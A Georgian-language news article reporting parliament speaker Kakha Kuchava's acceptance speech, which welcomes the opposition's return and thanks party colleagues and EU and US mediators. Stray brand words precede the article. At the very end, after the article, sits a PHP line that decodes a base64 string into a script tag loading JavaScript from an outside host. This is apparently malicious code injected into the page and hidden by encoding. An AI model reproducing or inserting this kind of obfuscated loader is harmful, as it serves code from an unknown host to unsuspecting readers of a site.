celsiusi
ავერსი საქკაბელი
მჯერა, რომ დღეიდან ჩვენ ვიწყებთ საპარლამენტო ცხოვრების ახალ ეტაპს - შედგა მრავალპარტიული პარლამენტი, ოპოზიციის ფართო სპექტრის მონაწილეობით, რაც იმას ნიშნავს, რომ ამ დარბაზში ამომრჩევლის ხმა მაქსიმალურად გაჟღერდება, - ამის შესახებ პარლამენტის თავმჯდომარემ, კახა კუჭავამ პარლამენტში სიტყვით გამოსვლისას განაცხადა.
 
როგორც მან განაცხადა, ის უზრუნველყოფს, რომ დაიცვას ბალანსი და ხელი შეუწყოს პარლამენტში დემოკრატიულ პროცესების განვითარებას.
 
„სიმბოლურია, რომ პარლამენტის ახალი თავმჯდომარის არჩევა სწორედ იმ დღეს დაემთხვა, როდესაც რამდენიმეთვიანი, მე ვიტყოდი, ხელოვნური შეფერხების შემდეგ, დღეს ოპოზიციის რამდენიმე პარტიის წარმომადგენელი შემოუერთდა საპარლამენტო საქმიანობას. ყველას დიდი მადლობა, ვინც იზრუნა იმისთვის, რომ საპარლამენტო ცხოვრება ჩვეულ რეჟიმში ჩამდგარიყო. მე მჯერა, რომ დღეს აქ ყველანი გამარჯვებულები ვართ, რაც მთავარია, გამარჯვებულია ჩვენი ქვეყანა და ჩვენი ხალხი. ამიტომ, ამ ტრიბუნასთან დგომა ძალიან დიდ პასუხისმგებლობას მაკისრებს, და მაძლევს იმედს, რომ პოლიტიკური პროცესები ქვეყანაში წარიმართება ცივილიზებულად, ისე, როგორც თითოეულ ჩვენგანი, ჩვენი საზოგადოება იმსახურებს ამას.
 
მინდა მადლობა გადავუხადო ჩვენს გუნდს, რომელმაც ასეთი დიდი ნდობა გამომიცხადა და მის ლიდერს ირაკლი კობახიძეს, რომლის ინიციატივაც იყო ჩემი კანდიდატურა წარდგენილია. ასევე მადლობა მინდა ვუთხრა არჩილ თალაკვაძეს, რომელსაც ურთულეს პერიოდში მოუხდა პარლამენტის თავმჯდომარის რანგში მუშაობა და მაქსიმუმი გააკეთა იმისთვის, რომ მძიმე მოლაპარაკებების პროცესი წარმატებით დასრულებულიყო.
 
ჩემი მხრივ, გპირდებით, რომ პარლამენტის თავმჯდომარის პოსტზე არჩევის შემთხვევაში, მე ვუზრუნველყოფ, რომ დავიცვა ბალანსი და ხელი შევუწყო დემოკრატიულ პროცესებს პარლამენტში, თქვენთან ერთად. მჯერა, ყველა პასუხისმგებლიანი პოლიტიკოსი და სახელმწიფოებრივად მოაზროვნე ყველა ჩემი კოლეგა დამეთანხმება, რომ დროა გადავდგათ ნაბიჯები ერთმანეთისკენ, კომპრომისებისა და დათმობის გზით, რისკენაც მოგვიწოდებს ჩვენი საზოგადოება, ჩვენი მეგობრები და საერთაშორისო პარტნიორები.
 
მინდა გულწრფელი მადლობა გადავუხადო საქართველოს ყველა გულშემატკივარს, ვინც ძალიან დიდი ენერგია ჩადო ქვეყანაში პოლიტიკური პროცესების ნორმალურ კალაპოტში დასაბრუნებლად. ეს უპრეცედენტო ძალისხმევა, რომელიც გასწია ევროკავშირმა და ამერიკამ ჩვენი ქვეყნის მიმართ, ნამდვილად დასაფასებელია. და მე მჯერა, რომ მაქსიმალურად გავამართლებთ ამ მოლოდინს, რომელიც საქართველოს, როგორც დემოკრატიისადმი ერთგული ქვეყნის, მიმართ არსებობს.
 
იმედი მაქვს, ჩვენ კიდევ შემოგვიერთდებიან კოლეგები, რომლებიც, სამწუხაროდ, დღეს არ ესწრებიან სხდომას, მაგრამ მოახერხებენ და დაძლევენ ვიწროპარტიულ ინტერესებს, პატივს სცემენ ამომრჩეველს და პოლიტიკურად სწორ ნაბიჯს გადადგამენ საპარლამენტო საქმიანობაში საკუთარი წვლილის შესატანად“, - აცხადებს კუჭავა.
1125
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");